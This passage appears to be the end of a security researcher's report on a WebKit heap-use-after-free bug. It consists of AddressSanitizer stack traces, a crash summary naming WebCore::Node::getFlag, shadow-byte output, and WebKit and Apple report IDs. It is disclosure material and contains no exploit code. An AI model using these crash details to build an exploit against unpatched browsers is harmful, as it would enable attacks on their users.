    #11 0x125bcf796 in JSC::LocalAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ce1796)
    #12 0x125bcf1f0 in JSC::LocalAllocator::allocateSlowCase(JSC::GCDeferralContext*, JSC::AllocationFailureMode) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ce11f0)
    #13 0x11649b246 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f03246)
    #14 0x11649ac29 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument, WTF::DumbPtrTraits<WebCore::HTMLDocument> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f02c29)
    #15 0x11649ab6b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument, WTF::DumbPtrTraits<WebCore::HTMLDocument> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f02b6b)
    #16 0x1164a91b1 in WebCore::toJSNewlyCreated(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument, WTF::DumbPtrTraits<WebCore::HTMLDocument> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f111b1)
    #17 0x114ae5915 in WebCore::jsDOMImplementationPrototypeFunctionCreateHTMLDocumentBody(JSC::ExecState*, WebCore::JSDOMImplementation*, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x54d915)
    #18 0x114ab7ef7 in long long WebCore::IDLOperation<WebCore::JSDOMImplementation>::call<&(WebCore::jsDOMImplementationPrototypeFunctionCreateHTMLDocumentBody(JSC::ExecState*, WebCore::JSDOMImplementation*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51fef7)
    #19 0x17ac3cce176  (<unknown module>)
    #20 0x123fffd08 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111d08)
    #21 0x123fffd08 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111d08)
    #22 0x123fffd08 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111d08)
    #23 0x123ff933a in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10b33a)
    #24 0x125d68964 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e7a964)
    #25 0x12633a5b9 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c5b9)
    #26 0x12633a74b in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c74b)
    #27 0x12633aaf1 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244caf1)
    #28 0x1164446b8 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1eac6b8)
    #29 0x116492b9c in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1efab9c)

previously allocated by thread T0 here:
    #0 0x11240da3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
    #1 0x7fff7cdbb1bc in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x21bc)
    #2 0x123fdca84 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xeea84)
    #3 0x123ff07dc in bmalloc::IsoTLS::debugMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1027dc)
    #4 0x116e58869 in void* bmalloc::IsoTLS::allocateSlow<bmalloc::IsoConfig<96u>, WebCore::HTMLHeadElement>(bmalloc::api::IsoHeap<WebCore::HTMLHeadElement>&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28c0869)
    #5 0x116e420fd in WebCore::HTMLHeadElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28aa0fd)
    #6 0x11483bd98 in WebCore::headConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a3d98)
    #7 0x11483209f in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29a09f)
    #8 0x117031c58 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a99c58)
    #9 0x117030c8c in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a98c8c)
    #10 0x117030a4a in WebCore::HTMLConstructionSite::insertHTMLHeadElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a98a4a)
    #11 0x11707f443 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ae7443)
    #12 0x117087130 in WebCore::HTMLTreeBuilder::defaultForBeforeHead() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2aef130)
    #13 0x11707fb32 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ae7b32)
    #14 0x11707dcee in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ae5cee)
    #15 0x1170375cc in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9f5cc)
    #16 0x11703715a in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9f15a)
    #17 0x117036364 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9e364)
    #18 0x117037ed7 in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl, WTF::DumbPtrTraits<WTF::StringImpl> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9fed7)
    #19 0x1169d09e3 in WebCore::DecodedDataDocumentParser::appendBytes(WebCore::DocumentWriter&, char const*, unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24389e3)
    #20 0x117291494 in WebCore::DocumentLoader::commitData(char const*, unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2cf9494)
    #21 0x10ebf981a in WebKit::WebFrameLoaderClient::committedLoad(WebCore::DocumentLoader*, char const*, int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x98f81a)
    #22 0x1172980c3 in WebCore::DocumentLoader::commitLoad(char const*, int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d000c3)
    #23 0x1173ce7af in WebCore::CachedRawResource::notifyClientsDataWasReceived(char const*, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e367af)
    #24 0x1173ce4da in WebCore::CachedRawResource::updateBuffer(WebCore::SharedBuffer&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e364da)
    #25 0x117368173 in WebCore::SubresourceLoader::didReceiveDataOrBuffer(char const*, int, WTF::RefPtr<WebCore::SharedBuffer, WTF::DumbPtrTraits<WebCore::SharedBuffer> >&&, long long, WebCore::DataPayloadType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dd0173)
    #26 0x117367e6b in WebCore::SubresourceLoader::didReceiveData(char const*, unsigned int, long long, WebCore::DataPayloadType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dcfe6b)
    #27 0x10f06611e in WebKit::WebResourceLoader::didReceiveData(IPC::DataReference const&, long long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdfc11e)
    #28 0x10f06ac60 in void IPC::handleMessage<Messages::WebResourceLoader::DidReceiveData, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(IPC::DataReference const&, long long)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(IPC::DataReference const&, long long)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe00c60)
    #29 0x10f06a01f in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe0001f)

SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb8619) in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const
Shadow bytes around the buggy address:
  0x1c100000d4f0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c100000d500: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x1c100000d510: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x1c100000d520: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x1c100000d530: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1c100000d540: fa fa fa fa fd fd[fd]fd fd fd fd fd fd fd fd fd
  0x1c100000d550: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x1c100000d560: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x1c100000d570: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x1c100000d580: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x1c100000d590: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==69151==ABORTING


WebKit bug tracker link: https://bugs.webkit.org/show_bug.cgi?id=186917
Apple product security report ID: 693711851
-->